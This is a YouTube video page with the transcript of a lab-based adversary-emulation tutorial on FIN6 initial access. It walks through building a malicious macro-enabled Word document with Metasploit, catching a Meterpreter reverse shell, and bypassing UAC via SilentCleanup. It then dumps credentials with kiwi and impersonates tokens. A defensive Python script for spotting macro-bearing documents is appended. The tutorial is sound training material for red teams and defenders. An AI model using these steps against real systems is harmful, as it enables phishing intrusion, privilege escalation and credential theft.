Emulating FIN6 - Gaining Initial Access (Office Word Macro)
32:19

HackerSploit · 16.01.2025 · 6,476 views · 283 likes

Video description

Welcome to the next installment in our adversary emulation series! This video focuses on emulating initial access via a spear-phishing attachment: specifically, a malicious Word document with an embedded macro, just like FIN6 might use.

🚨 Next Up: If you want to manually develop your own VBA macros for initial access, don't worry; we've got you covered in the next video, where we'll dive deeper into crafting custom macros for red team operations.

🎥 Practical Labs: This video uses the CYBER RANGES platform to simulate a realistic attack environment. Try it out and follow along!

// Adversary Emulation Labs
New to CYBER RANGES? Register here: https://bit.ly/40dRMsb
CYBER RANGES Adversary Emulation Labs (Free): https://bit.ly/4amBPEU
The lab used in this video: https://app.cyberranges.com/scenario/624cd3877733a30007185a15

🔗 Video Resources & References
CTID Adversary Emulation Library: https://github.com/center-for-threat-informed-defense/adversary_emulation_library

🎥 Have an idea for a video? Make your submission here: https://forms.gle/VDwwMsuudzQfT9VM6

// MORE RESOURCES
HACKERSPLOIT BLOG ►► https://bit.ly/3qjvSjK
HACKERSPLOIT FORUM ►► https://bit.ly/39r2kcY
HACKERSPLOIT ACADEMY ►► https://bit.ly/39CuORr
CYBER RANGES (LABS) ►► https://app.cyberranges.com

// SOCIAL NETWORKS
TWITTER ►► https://bit.ly/3sNKXfq
INSTAGRAM ►► https://bit.ly/3sP1Syh
LINKEDIN ►► https://bit.ly/360qwlN
PATREON ►► https://bit.ly/365iDLK
MERCHANDISE ►► https://bit.ly/3c2jDEn

// MY BOOKS
Privilege Escalation Techniques ►► https://amzn.to/3ylCl33
Docker Security Essentials (FREE) ►► https://bit.ly/3pDcFuA

// SUPPORT THE CHANNEL
NordVPN Affiliate Link (73% Off) ►► https://bit.ly/3DEPbu5
Get $100 In Free Linode Credit ►► https://bit.ly/3yagvix

// CYBERTALK PODCAST
Spotify ►► https://spoti.fi/3lP65jv
Apple Podcasts ►► https://apple.co/3GsIPQo

// WE VALUE YOUR FEEDBACK
We hope you enjoyed the video and found value in the content. We value your feedback. If you have any questions or suggestions, feel free to post them in the comments section or contact us directly via our social platforms.

// THANK YOU!
Thanks for watching! Благодарю за просмотр! Kiitos katsomisesta! Danke fürs Zuschauen! 感谢您观看 Merci d'avoir regardé Obrigado por assistir دیکھنے کے لیے شکریہ देखने के लिए धन्यवाद Grazie per la visione Gracias por ver شكرا للمشاهدة

#pentesting #cybersecurity #hacker

Contents (7 segments)

Segment 1 (00:00 - 05:00)

Hey guys, HackerSploit here, back again with another video. Welcome back to the adversary emulation series, where we'll be exploring the process of emulating and/or simulating the tradecraft and TTPs of real-world threat actors and APT groups. In this video we're going to be focusing on FIN6. FIN6 is a financially motivated threat actor known for its sophisticated tactics, and our primary objective in this video is to emulate, to begin with, the initial access techniques that we outlined in the emulation plan in the previous video. So if you're getting to this video without watching that one, or this is your first time watching one of the adversary emulation videos, I would highly recommend you take a look at the previous video, where we outlined the emulation plan.

The objective here is to focus primarily on initial access via a spear-phishing attachment. We're not going to be focusing on the actual delivery of the document and things like that; I'll speak on some of the other techniques, or some of the TTPs we can adapt, as we proceed. But the objective, as I said, is to emulate initial access via a spear-phishing attachment, so we're primarily going to focus on the fundamentals to get things going, and then, as we progress, in the next video I'll probably make a video on how to develop your own VBA macros, your spear-phishing documents let's say, from scratch.

Once we achieve initial access we're going to move into local privilege escalation. If you have gone through the lab that I mentioned in the previous video, you may not have seen a section on local privilege escalation, but that's what I'll be walking through as well, and all of this will set the stage for the next phase of FIN6 emulation, which will be Active Directory enumeration. Then we'll cover Active Directory privilege escalation in another video, and finally we'll have a final video on exfiltration. I'm covering each of the phases, each section of the attack lifecycle, in its own video, to make these shorter and much easier to consume.

Just to reiterate one more time: for the purpose of this video we'll be following the emulation plan and will automate the development of the macro-enabled document with Metasploit. However, in the next video, the video after this one, I'll pretty much cover the process of how to develop your own VBA macros for initial access. So for any of you who were wondering whether I was going to cover this in detail, I will. The idea is to firstly get you going, and then we can explore some of these techniques or sub-techniques in greater detail, which is exactly my goal. Don't worry if that was one of the things you were looking forward to; we will get to that, and once we've covered that we'll move on to the Active Directory side of things.

Before we get started I just want to revisit the emulation plan. A link to this will be in the description section; we outlined it in the previous video. On the Center for Threat-Informed Defense Adversary Emulation Library GitHub repo, you can see I'm currently in the FIN6 folder, and this is the emulation plan that we'll be utilizing, or that the lab on CYBER RANGES utilizes, I should say. We are primarily interested in Phase One, and this is what we're emulating to begin with. This plan really doesn't focus on initial access, but just outlines the two primary initial access vectors, or techniques if you will, that FIN6 has been known to use. If we take a look at the TTPs on the ATT&CK Navigator, you can see that their primary initial access techniques revolve around valid accounts, which have also come in handy for FIN6 when performing lateral movement, but you can see the primary ones are utilizing a spear-phishing attachment, etc. Given that once we have gained initial access we're essentially in the realm of execution, or

Segment 2 (05:00 - 10:00)

whenever we enter or type in a command, that's considered execution, we need to also understand what command and scripting interpreter FIN6 has been known to use. FIN6, given the choice of tools, has utilized Cobalt Strike and Metasploit's Meterpreter, but primarily they utilize the Windows command shell, although not that much; I think if you look at it, or analyze a lot of their campaigns, you can see there's a lot of use of PowerShell. So we'll also be doing that, or facilitating that through Meterpreter. Hopefully that makes sense.

Again, if this is your first time watching this series, we are going through these emulation videos, or emulation exercises if you will, using a set of pre-built labs that are absolutely free to access, which I actually built. These were based on the adversary emulation labs that were posted on GitHub by the MITRE Engenuity team; again, a reference or info on that is in the previous video. In any case, I'm not going to waste more time. A link to the playlist on CYBER RANGES is in the description section, and we're going to be utilizing Lab 1.3. If you're new to CYBER RANGES, you can just visit app.cyberranges.com; registering for an account is free, and again the link will be in the description. You can head over to the Community section once you've created your account, and you want to look for this playlist of labs here, the MITRE ATT&CK Defender Adversary Emulation Fundamentals playlist. We already went through Lab 1.1 in the previous video, so now it's 1.3, and I'm just going to go ahead and start it. I believe I had my lab already good to go.

This lab pretty much has whatever we are going to be covering documented, so pretty much whatever commands or phases we'll go through. However, as I said, there's going to be a slight deviation, because within the lab documentation, when you're emulating or simulating a victim downloading and opening the document, you can see that the official documentation tells you to run Word as administrator, which we're not going to do, because in the case of this lab, this specific walkthrough documentation skips local privilege escalation, which I think is not that realistic. So I'm actually going to include that in my demo. In any case, you have the walkthrough here in the overview, so you can always refer back to this, and if you want to access any of the systems, we have a Kali Linux system that's good to go. This is the IP within the lab environment; you can access it in your browser via RDP, and these are the credentials for the Kali Linux system. Then for the domain controller here, that's running I think Windows Server 2016 or 2019, we'll have to find out; you can see the credentials here. These can both be accessed directly in your browser without any issues, so when you open it up you'll have the Guacamole dashboard, where you can then open up your Kali Linux system, like so, and we'll start off here. This should be fairly simple; this demo will not be that complex.

Now, on your Kali Linux system, specifically for this lab as well as the other labs within the playlist, there's going to be an adversary emulation folder found within the home directory of the attacker user, and this contains a folder called labs and the setup scripts. It's recommended to go through these and essentially set your working directory to the lab that you're currently working on, just to organize things. So what I'll do here is I'll open up my terminal and I will just increase the font size so you guys can see this a little bit better. It's probably smarter to make this full screen; I don't know whether Firefox will allow me to refresh this. Let's go ahead and check this now, or to essentially extend it. There we are, so we have Kali up and running. I'll now navigate into the adversary emulation folder, then labs, and then Lab 1.3, that's the one we're currently working in. Now that we're within our working folder, I'm just going to open up msfconsole. We don't really need the database; if

Segment 3 (10:00 - 15:00)

you want to, you can, but yeah. Another thing to point out is that this particular lab, if I just exit full screen here, this specific lab actually covers all the techniques ranging from initial access all the way to AD enumeration, so do keep that in mind. We're just focusing on initial access first, and then you can go through the rest of the steps, but there's a couple of important things that I think you should wait for, if you want to. In any case, there we are.

In order to simulate the creation of our malicious attachment, we are going to leverage a fairly useful, although not that effective, module, just so that we can establish initial access: we're going to utilize the Word macro module. So I'm going to just search for "word macro", something like this, and that's the one here. It's an exploit module: office_word_macro, Microsoft Office Word Malicious Macro Execution. So I'll just say use, specifying the ID of the module. I'm going to set the payload to windows/x64, so a 64-bit Meterpreter payload, and then we're just going to use reverse TCP, like so, and now I'll just say show options. The LHOST is already set to the IP address of the Kali Linux system. We will not change the exit function from thread, and that's actually a good thing, especially on modern versions of Windows, and I think I can explain that now.

The EXITFUNC option in Metasploit is specifically relevant when you are configuring your payload, really Windows payloads to be honest, although you might see them with Linux. This option essentially allows you to specify how the payload will handle process termination after the exploit is executed successfully, so it pretty much determines the mechanism that the payload will use to exit cleanly from the exploited process. This is important because improper termination can crash the target application, potentially alerting the user or a defender. In this case, because the target, or the victim, who we're going to assume is running on the Windows system, is going to open up a Word document, if we went for, let's say, the process option, what this does is it terminates the entire process in which the exploit is running. Given that the macro will be executed by Word, within the Word process, if we utilize the process exit function, then once it's done it'll pretty much give us a Meterpreter session, but then it'll terminate Word, which is something we don't want, both from a convenience perspective but also from a general OPSEC perspective: you don't want the target to know that there's something iffy or something wrong with the document that they've just opened. The thread option is actually the recommended one when targeting a Windows application, something like Word, and it's very useful if you want the application that you're targeting to remain operational or exit gracefully without triggering alerts. The way thread works is that it ends the thread that the payload is running in, leaving the rest of the application, in this case Microsoft Word, running; it does not terminate the entire process, only the specific thread spawned for the exploit. And then of course you have SEH, which I'll just explain really quickly if you're not familiar with it. SEH stands for structured exception handling. When you select that option, it utilizes SEH to gracefully terminate the exploited process, and it goes without saying that SEH is a Windows-specific mechanism that allows for handling exceptions, or errors if you will, during program execution. So in our case we'll just go for thread.

This module requires a file name if you want to; you can see it's going to utilize the .docm extension, which is an alias for, or pretty much just tells you that, this is a macro-enabled document. In the next video I'll explain how you can utilize ActiveX and stuff to actually utilize, well, I wouldn't say .docx, but let's say a .doc,

Segment 4 (15:00 - 20:00)

for example. And you can specify a custom template, a .docx template, which is actually very useful: if you have a custom .docx template that's part of your phishing or spear-phishing attempt, you can actually specify the path to the file. In our case we'll just go for the defaults and we'll just hit exploit to generate it. It's going to generate it using the default template that's under /usr/share/metasploit-framework/data/exploits/office_word_macro/template.docx, and you can actually see, there we are, it's saved under /root/.msf4/local/msf.docm. So I'm just going to copy the path to that file, open up a new tab and navigate to adversary emulation, labs and Lab 1.3, just so that I'm working within the appropriate folder; it's not required, but organization is very useful. I'll then say sudo cp; we don't really need to move it, given that this is not my Kali Linux system, so we can just copy it. There we go, and now we have that.

Before we actually transfer it to the target system, or we simulate a phishing attempt, which will essentially involve us somehow transferring the document to the Windows system and then simulating the user opening the document, in order for us to actually receive the Meterpreter session we're going to utilize the exploit multi handler, exploit/multi/handler. We're going to set the payload to windows/x64/meterpreter/reverse_tcp, and then for the options here we're going to set the LHOST to the Kali Linux IP, which will be the same for you given that these IPs are static, and then we need to change the exit function to thread. This is very important, otherwise Word will pretty much terminate once the payload is executed. So we're going to say set EXITFUNC thread, because that's what we had used when generating the document as well, and we'll just use the LPORT option we used when generating the document. Now we can just hit exploit or run, and we have our handler running.

To transfer it to the target, I'm just going to set up a very simple web server with Python, the Python 3 module http.server. So I'm just going to say sudo python3 -m http.server 8080, and we're going to host it. Now we can switch over to the Windows system, so I'll just open up that system via RDP. We're now simulating the actual process of the user downloading the document somehow and then opening it up. We'll just put in the password there for the user mad admin. Again, I know this is not proper phishing or proper emulation, but this emulation plan was really designed to be more focused on the post-compromise phase; I thought it would be a good idea to actually go through this. In any case, we can utilize PowerShell here; of course in a normal instance the user would ideally download it or get it from an email, but in our case we're simulating this. I'll just navigate to the desktop so we can download it there, and then we can utilize PowerShell to say Invoke-WebRequest. I'll just increase the font size here so that it's clear for you guys, because I know sometimes this can be a little bit difficult to read. There we are. Then we just say -Uri, the IP address of the web server hosting the document, which in this case is going to be the Kali Linux system, so 192 1681 125 103, and I believe we ran the web server on port 8080; the name of the file is just msf.docm. Then we'll specify the -OutFile name: we'll save it under C:\Users, the name of this user, mad admin, Desktop, and we'll just say msf.docm, like so. Hit enter; that looks like it's done. And again, now this is where we'll deviate from what's in the actual lab documentation: we're not going to run Word as admin, because no one

Segment 5 (20:00 - 25:00)

ever does that. So we're just going to open up the document now. If you get an activation error, don't worry, that's not going to affect the lab or this particular demo. We're going to give Word a couple of seconds to start up; it may take a minute, who knows with Word. All right, so I'm just going to wait for this to open up; I don't want to skip through. There we go. OK, so: users, view only, the macro will still work; next, don't send optional data, done. And there we are. This is the template that Metasploit uses, or that module uses. You can see it's fairly convincing: this document is essentially telling the user that this document was created by a newer version of Microsoft Office and macros must be enabled. So let's go ahead and play the part of the stupid user, and for some reason, I don't know, this is very strange... there we are. Looks like it executed. So now, how do I exit? Oh yeah, I'm in full screen. I'll go back into the Kali Linux system. The macro executed; you can see we get a GET request here, well, that was because we downloaded it, but here we have the Meterpreter session: the stage is sent and we have session one.

First things first, let's learn a little bit about our system. We can see the computer host name is Target DC, 64-bit; we also have a 64-bit Meterpreter session; logged-on users, 13, that's very strange. I'm just going to migrate my process to explorer, so I'm just going to search for the process ID for explorer.exe and then migrate to 4992, like so. There we are, that should work without any issues. getuid: you can see mad admin. In this particular case now, if I say getprivs to essentially view whether we are elevated, you can see we are not, because the privilege set that we have is not indicative of us being an elevated user, or a user with an elevated context. We'll open up a command shell session and say net user, so we can see there's an Administrator, mad admin, which is who we are, there's also admin, krbtgt. But at this point we would not need to do any crazy enumeration; we can just try and confirm the privilege set, so whoami /priv, like so. Yeah, that's correct. If I now say net localgroup administrators, just to check if this user is part of the local Administrators group, we can see that mad admin is indeed part of this group. So while we are not elevated, we can leverage a technique like bypassing UAC to elevate our privileges fairly easily, and that shouldn't take too much time at all.

In this particular case, if I just terminate this particular channel and put this in the background... for example, if I say load kiwi, just to show you this, and then we can just say creds_all, just to show you that we're not elevated: there we are, not running as SYSTEM. I think I can also try and load incognito to see whether we have any tokens we can impersonate, so I can say list_tokens, just the user tokens. There we are: there's just the delegation tokens for the user mad admin, so we can't really do much on that front. In any case, what we can try and do now is just put this in the background and search for bypassuac, and the module that operates best for Windows Server is the SilentCleanup module, if I can find it somewhere here. I believe this is the one here, so there we are. We'll just say use 9, and there we are.

Segment 6 (25:00 - 30:00)

We can actually set our payload to Windows now; we might need to play around with this, but we'll just say windows/x64/meterpreter/reverse_tcp, then show options. In this case, do we need to change the exit function? No, I don't think we do. LPORT 5555, let's just change it for organization. We want to set the session ID, so set SESSION 1, and the partial path, that's very important. This is always a good module, because this path, partial view one, is always going to be there. If I say show info, if you want to learn more about this: there's a task in the Windows Task Scheduler called SilentCleanup which, while it's executed as Users, automatically runs with elevated privileges. When it runs it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control the user's environment variables, the windir variable, or path if you will, normally pointing to C:\Windows, can be changed to point wherever we want, and it'll run as admin. We can set the sleep time, but it does actually perform cleanup, I believe. In any case, we can try it out; let's see if it actually works. Yeah, we are part of the Administrators group and it's going to send the stage. This is taking a bit more time, so we probably want to use a different payload, or even an unstaged payload, because these can be quite tricky. We're just going to wait and see whether we get anything. I doubt we'll get any prompt, because this is a silent technique, so we shouldn't get any UAC prompt here. What am I doing, weird, always switching back. In any case, let me go back; I'm in an operating system within an operating system, so multiple layers of abstraction. Anyway, I'm not sure this is working... oh, it looks like we did get it, so yeah, that's port 5555. So let's try and see whether this worked: getuid, we should still be mad admin; however, if I now say getprivs we should have the elevated privilege set, and you can see pretty much everything you would expect here. Now if I say load kiwi, or something like this, and I say creds_all, there we go. OK, so that's not an issue; that's primarily the Meterpreter session. So we can now impersonate NT AUTHORITY and that will update the context from Meterpreter, so we can now say impersonate_token, and again, if you're not familiar with this, it really is very simple: we just specify the name of the token we want to impersonate. There we are. Now we say getuid, there we are, and then I can now say creds_all, like so, and that now works.

So that's pretty much it, and the final thing in this video that I wanted to cover was of course the command and scripting interpreters. As I mentioned earlier on in this video, the most common command and scripting interpreter that FIN6 has been known to use is PowerShell. Luckily for us, Meterpreter has an inbuilt PowerShell interpreter, so I can say load powershell and then we can utilize powershell_shell, and this is what we'll primarily be using. This is much more stable than the command shell, which as you know can be quite tricky. That is pretty much all that I wanted to cover in this video; I think it's already about 30 minutes, so I think it was a good idea. In any case, that's going to be it for this video. In the next video we are going to be taking a look at how

Segment 7 (30:00 - 32:00)

to generate your own macro-enabled document, how to craft or weaponize VBA macros. In essence, you'll be able to create your own macro-enabled Word document that will give you a reverse shell, but the bottom line is you'll actually create the actual VBA code yourself. So that's the objective for the next video, and then after that we'll resume with this lab and move on to Active Directory enumeration and staging the files, all the information that we're gathering, for exfiltration. With that being said, that brings us to the end of this video. If you enjoyed this video or found value in it, leave a like; as you know, it really does help in getting this video, as well as other videos, out to more people, and improves its visibility in the algorithm, or helps boost the visibility of the video. If you have any questions or feedback, feel free to leave a comment down below. Furthermore, and this is very important, if you have any video ideas or topics that you'd like me to cover, please take a look at the content suggestions form in the description section. It's a very simple Google form that allows you to submit your suggestions, and it's based on that I'm actually going to cover, you know, someone requested the process of actually developing your own macros, so you can see that I'm going to take your feedback quite seriously. The final thing I just want to say is, if this is your first time interacting with the CYBER RANGES platform, do take a look at the adversary emulation playlist as well as the other free ones; there's another playlist that I developed on red team tradecraft, so you can also check some of the previous videos. Anyway, thank you very much for watching, guys, and with that being said, I'll be seeing you in the next video.
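Editor's note, added after the transcript: the following example is not part of the video, the transcript or the CTID emulation library. The video generates a .docm whose macro launches the Meterpreter stager, and the only thing the victim sees is the "enable macros" lure. The defender-side counterpart a practitioner usually wants is a triage check for the artifact itself: a .docm is an OOXML ZIP container in which the macro code lives in the part word/vbaProject.bin and [Content_Types].xml declares the macro-enabled main document type. The script below inspects those indicators in the container rather than trusting the file extension, and flags a macro-bearing file that has been renamed to .docx. All sample documents it builds are constructed placeholders (the vbaProject.bin payload is a byte string, not a real OLE compound file), and the filenames invoice.docx and msf.docm are only examples.

```python
"""Triage an OOXML Word document for an embedded VBA project (added example)."""
import io
import zipfile

CONTENT_TYPES_PART = "[Content_Types].xml"
VBA_PROJECT_PART = "word/vbaProject.bin"
MACRO_MAIN_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
VBA_PROJECT_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
DOCX_MAIN_CONTENT_TYPE = (
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
)
# Procedure names that Word runs without further user action once macros are enabled.
AUTO_EXEC_NAMES = (b"AutoOpen", b"Document_Open", b"AutoExec", b"AutoClose", b"Document_Close")


def inspect_office_doc(data: bytes, filename: str = "") -> dict:
    """Return macro indicators found in the raw document bytes."""
    findings = {
        "is_ooxml_zip": False,
        "has_vba_project": False,
        "macro_enabled_content_type": False,
        "auto_exec_hints": [],
        "extension_mismatch": False,
    }
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):
        return findings  # legacy binary .doc, or not an Office file at all
    with zipfile.ZipFile(buf) as zf:
        names = set(zf.namelist())
        findings["is_ooxml_zip"] = CONTENT_TYPES_PART in names
        findings["has_vba_project"] = VBA_PROJECT_PART in names
        if findings["is_ooxml_zip"]:
            ctypes = zf.read(CONTENT_TYPES_PART).decode("utf-8", "replace")
            findings["macro_enabled_content_type"] = (
                MACRO_MAIN_CONTENT_TYPE in ctypes or VBA_PROJECT_CONTENT_TYPE in ctypes
            )
        if findings["has_vba_project"]:
            # Best-effort only: module streams inside vbaProject.bin use MS-OVBA
            # compression, so a name can be split across tokens and missed. Use
            # olevba for a real decompile; a hit here is still a strong indicator.
            blob = zf.read(VBA_PROJECT_PART)
            findings["auto_exec_hints"] = [n.decode() for n in AUTO_EXEC_NAMES if n in blob]
    has_macro = findings["has_vba_project"] or findings["macro_enabled_content_type"]
    # A macro-bearing container delivered as .docx is a classic disguise.
    findings["extension_mismatch"] = bool(has_macro and filename.lower().endswith(".docx"))
    return findings


def build_sample_doc(with_macro: bool) -> bytes:
    """Constructed minimal OOXML container for testing; not a real Word file.

    The vbaProject.bin content is a placeholder byte string (assumption for the
    example), not a genuine OLE compound file; it is enough to exercise the checks.
    """
    main_type = MACRO_MAIN_CONTENT_TYPE if with_macro else DOCX_MAIN_CONTENT_TYPE
    vba_override = (
        f'<Override PartName="/{VBA_PROJECT_PART}" ContentType="{VBA_PROJECT_CONTENT_TYPE}"/>'
        if with_macro
        else ""
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        f"{vba_override}</Types>"
    )
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(CONTENT_TYPES_PART, content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr(VBA_PROJECT_PART, b"\xd0\xcf\x11\xe0PLACEHOLDER Document_Open Shell(...)")
    return out.getvalue()


if __name__ == "__main__":
    samples = (
        ("invoice.docx", build_sample_doc(with_macro=False)),   # clean document
        ("invoice.docx", build_sample_doc(with_macro=True)),    # macro doc renamed to .docx
        ("msf.docm", build_sample_doc(with_macro=True)),        # honest .docm
    )
    for name, blob in samples:
        print(name, inspect_office_doc(blob, name))
```

Run it as-is to see the three constructed cases; point `inspect_office_doc` at the bytes of a real attachment to triage it. Treat `auto_exec_hints` as a hint only and hand anything with `has_vba_project` set to a proper VBA decompiler before deciding it is benign.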
